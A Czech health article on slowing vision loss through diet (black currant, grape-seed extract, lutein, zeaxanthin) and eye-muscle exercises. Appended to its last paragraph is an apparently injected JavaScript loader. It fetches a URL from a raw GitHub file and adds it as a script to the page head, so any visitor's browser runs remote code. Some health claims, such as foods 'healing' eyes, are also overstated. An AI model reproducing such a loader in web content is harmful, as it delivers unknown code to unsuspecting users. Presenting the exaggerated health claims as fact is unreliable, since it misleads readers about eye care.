Oči jsou jedním z nejdůležitějších a zároveň nejnamáhavějších orgánů našeho těla. Zvlášť v dnešní době jsou oči velmi namáhány. Několikahodinové sledování obrazovky počítače, večer pak televize, mezitím displeje mobilu jim rozhodně neprospívá. Zrak se zhoršuje čím dál mladším lidem, brýle už dávno nejsou doménou seniorů. Jak zmírnit zhoršování zraku?

Strava

I když vás to možná překvapí, ve vcelku běžných potravinách existují látky, které mají schopnost oči uzdravovat, zmírnit jejich příznaky stárnutí.

Černý rybíz je první z těchto potravin. Je bohatý na pigmentové antioxidanty, tzv. antokyany, které ve spolupráci s dalšími pofenoly chrání buňky před poškozením, posilují krevní cévy v očích, zmírňují oxidační stres a snižují nitrooční tlak a záněty v očích. Tyto látky jsou také obsaženy i borůvkách, v bezu, v hroznovém vínu, ale v černém rybízu nejvíc.

Další super potravinou pro zdravý zrak je extrakt z hroznového vína. Podobně jako černý rybíz i hroznová jádra obsahují silné antioxidanty a protizánětlivé látky. Extrakt z hroznových jader obsahuje  takzvané proanthocyanidiny. Ty chrání epitelové buňky oční čočky před poškozením volnými radikály a předchází tak šedému zákalu, rovněž chrání nervové buňky na sítnici.

Lutein a Zeaxantin

Lutein a zeaxanthin jsou žlutooranžová rostlinná barviva, která patří mezi karotenoidy. Shromažďují se především v sítnici oka a tělo si je nedokáže samo vytvářet. Musíme tedy dbát na jejich dostatečný přísun. Kromě toho, že mají tyto látky opět silné antioxidační účinky, chrání náš zrak před slepotou, zostřuje vidění, chrání totiž centra sítnice, díky nimž vidíme jemné detaily.

Tyto látky nalezneme především v listové zelenině, ve špenátu, brokolici, mangoldu, růžičkové kapustě, zelí, kukuřici, dýních, mandarinkách a nektarinkách. Také ve vaječném žloutku. Lutein i Zeaxantin se prodávají i jako potravinové doplňky.

Cvičení očí

Oči jsou párový orgán, které mají šest okohybných svalů. Tyto svaly stejně jako ostatní svaly v těle nutné posilovat, neboť i jejich ochabování způsobuje zhoršení zraku, ostrosti vidění. Cvičení je poměrně jednoduché a zabere pár minut. Očima cíleně pohybovat nahoru a dolů, do stran, co nejvíce pohyb dotáhnout. Po té můžete očima kroužit, na jednu pak na druhou stranu. Několikrát opakujte. Cvičení můžete provádět s otevřenýma a pak i zavřenýma očima. (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)